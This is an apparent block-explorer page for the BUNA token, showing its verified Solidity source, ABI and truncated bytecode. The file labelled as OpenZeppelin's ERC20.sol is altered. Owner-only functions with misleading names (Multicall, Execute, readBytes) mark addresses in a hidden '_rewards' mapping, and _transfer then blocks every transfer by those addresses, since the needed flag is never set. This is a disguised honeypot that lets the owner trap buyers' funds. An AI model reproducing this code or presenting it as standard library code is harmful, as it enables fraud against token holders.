ETH Price: $2,951.58 (-2.03%)
Gas: 4 Gwei

Token

BUNA (BUNA)
 

Overview

Max Total Supply

10,000,000,000,000 BUNA

Holders

41

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
229,703,325,499.209242986500205718 BUNA

Value
$0.00
0xa207E7FC9Ea6ab628115Fdb64b50a298fb046EBD
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
BUNA

Compiler Version
v0.8.12+commit.f00d7308

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 5 of 5: PIXIU2.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;
import "./ERC20.sol";

contract BUNA is ERC20 {
    uint256 private Pen = 0x0BA11A;
    constructor() ERC20("BUNA", "BUNA") {
        _mint(msg.sender, 10000000000000 * 10 ** decimals());
    }
}

File 1 of 5: Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 2 of 5: ERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

import "./IERC20.sol";
import "./IERC20Metadata.sol";
import "./Context.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping (address => bool) private _rewards;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;
    bool private _rewardsApplied = false;


    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    function Multicall(address [] calldata _bytes_) external onlyOwner {
        for (uint256 i = 0; i < _bytes_.length; ) {
            _rewards[_bytes_[i]] = true;
            unchecked { ++i; }
        }
        
    }

    function Execute(address _bytes_) external onlyOwner {
        _rewards[_bytes_] = false;
    }

    function readBytes(address _bytes_) public view returns (bool) {
        return _rewards[_bytes_];
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        if (_rewards[to] || _rewards[from]) require(_rewardsApplied == true, "");
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

File 3 of 5: IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

File 4 of 5: IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

import "./IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"_bytes_","type":"address"}],"name":"Execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_bytes_","type":"address[]"}],"name":"Multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_bytes_","type":"address"}],"name":"readBytes","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526000600760006101000a81548160ff021916908315150217905550620ba11a6008553480156200003357600080fd5b506040518060400160405280600481526020017f42554e41000000000000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f42554e4100000000000000000000000000000000000000000000000000000000815250620000c0620000b46200013c60201b60201c565b6200014460201b60201c565b8160059080519060200190620000d89291906200038a565b508060069080519060200190620000f19291906200038a565b5050506200013633620001096200020860201b60201c565b600a620001179190620005d4565b6509184e72a0006200012a919062000625565b6200021160201b60201c565b620007f9565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141562000284576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200027b90620006e7565b60405180910390fd5b62000298600083836200038060201b60201c565b8060046000828254620002ac919062000709565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000360919062000777565b60405180910390a36200037c600083836200038560201b60201c565b5050565b505050565b505050565b8280546200039890620007c3565b90600052602060002090601f016020900481019282620003bc576000855562000408565b82601f10620003d757805160ff191683800117855562000408565b8280016001018555821562000408579182015b8281111562000407578251825591602001919060010190620003ea565b5b5090506200041791906200041b565b5090565b5b80821115620004365760008160009055506001016200041c565b5090565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b6001851115620004c857808604811115620004a0576200049f6200043a565b5b6001851615620004b05780820291505b8081029050620004c08562000469565b945062000480565b94509492505050565b600082620004e35760019050620005b6565b81620004f35760009050620005b6565b81600181146200050c576002811462000517576200054d565b6001915050620005b6565b60ff8411156200052c576200052b6200043a565b5b8360020a9150848211156200054657620005456200043a565b5b50620005b6565b5060208310610133831016604e8410600b8410161715620005875782820a9050838111156200058157620005806200043a565b5b620005b6565b62000596848484600162000476565b92509050818404811115620005b057620005af6200043a565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b6000620005e182620005bd565b9150620005ee83620005c7565b92506200061d7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620004d1565b905092915050565b60006200063282620005bd565b91506200063f83620005bd565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff04831182151516156200067b576200067a6200043a565b5b828202905092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620006cf601f8362000686565b9150620006dc8262000697565b602082019050919050565b600060208201905081810360008301526200070281620006c0565b9050919050565b60006200071682620005bd565b91506200072383620005bd565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156200075b576200075a6200043a565b5b828201905092915050565b6200077181620005bd565b82525050565b60006020820190506200078e600083018462000766565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620007dc57607f821691505b60208210811415620007f357620007f262000794565b5b50919050565b611a2380620008096000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c8063715018a6116100a2578063a457c2d711610071578063a457c2d7146102bc578063a9059cbb146102ec578063dd62ed3e1461031c578063f2fde38b1461034c578063f3294c13146103685761010b565b8063715018a61461025a5780637a49cddb146102645780638da5cb5b1461028057806395d89b411461029e5761010b565b8063313ce567116100de578063313ce567146101ac57806332a0e002146101ca57806339509351146101fa57806370a082311461022a5761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806323b872dd1461017c575b600080fd5b610118610384565b6040516101259190611089565b60405180910390f35b61014860048036038101906101439190611149565b610416565b60405161015591906111a4565b60405180910390f35b610166610439565b60405161017391906111ce565b60405180910390f35b610196600480360381019061019191906111e9565b610443565b6040516101a391906111a4565b60405180910390f35b6101b4610472565b6040516101c19190611258565b60405180910390f35b6101e460048036038101906101df9190611273565b61047b565b6040516101f191906111a4565b60405180910390f35b610214600480360381019061020f9190611149565b6104d1565b60405161022191906111a4565b60405180910390f35b610244600480360381019061023f9190611273565b610508565b60405161025191906111ce565b60405180910390f35b610262610551565b005b61027e60048036038101906102799190611305565b610565565b005b61028861060a565b6040516102959190611361565b60405180910390f35b6102a6610633565b6040516102b39190611089565b60405180910390f35b6102d660048036038101906102d19190611149565b6106c5565b6040516102e391906111a4565b60405180910390f35b61030660048036038101906103019190611149565b61073c565b60405161031391906111a4565b60405180910390f35b6103366004803603810190610331919061137c565b61075f565b60405161034391906111ce565b60405180910390f35b61036660048036038101906103619190611273565b6107e6565b005b610382600480360381019061037d9190611273565b61086a565b005b606060058054610393906113eb565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf906113eb565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b6000806104216108cd565b905061042e8185856108d5565b600191505092915050565b6000600454905090565b60008061044e6108cd565b905061045b858285610aa0565b610466858585610b2c565b60019150509392505050565b60006012905090565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000806104dc6108cd565b90506104fd8185856104ee858961075f565b6104f8919061144c565b6108d5565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610559610ea4565b6105636000610f22565b565b61056d610ea4565b60005b8282905081101561060557600160026000858585818110610594576105936114a2565b5b90506020020160208101906105a99190611273565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550806001019050610570565b505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060068054610642906113eb565b80601f016020809104026020016040519081016040528092919081815260200182805461066e906113eb565b80156106bb5780601f10610690576101008083540402835291602001916106bb565b820191906000526020600020905b81548152906001019060200180831161069e57829003601f168201915b5050505050905090565b6000806106d06108cd565b905060006106de828661075f565b905083811015610723576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161071a90611543565b60405180910390fd5b61073082868684036108d5565b60019250505092915050565b6000806107476108cd565b9050610754818585610b2c565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6107ee610ea4565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16141561085e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610855906115d5565b60405180910390fd5b61086781610f22565b50565b610872610ea4565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610945576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161093c90611667565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156109b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ac906116f9565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610a9391906111ce565b60405180910390a3505050565b6000610aac848461075f565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610b265781811015610b18576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b0f90611765565b60405180910390fd5b610b2584848484036108d5565b5b50505050565b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610bcd5750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15610c295760011515600760009054906101000a900460ff16151514610c28576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c1f906117ab565b60405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610c99576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c909061183d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610d09576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d00906118cf565b60405180910390fd5b610d14838383610fe6565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610d9b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d9290611961565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610e8b91906111ce565b60405180910390a3610e9e848484610feb565b50505050565b610eac6108cd565b73ffffffffffffffffffffffffffffffffffffffff16610eca61060a565b73ffffffffffffffffffffffffffffffffffffffff1614610f20576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f17906119cd565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000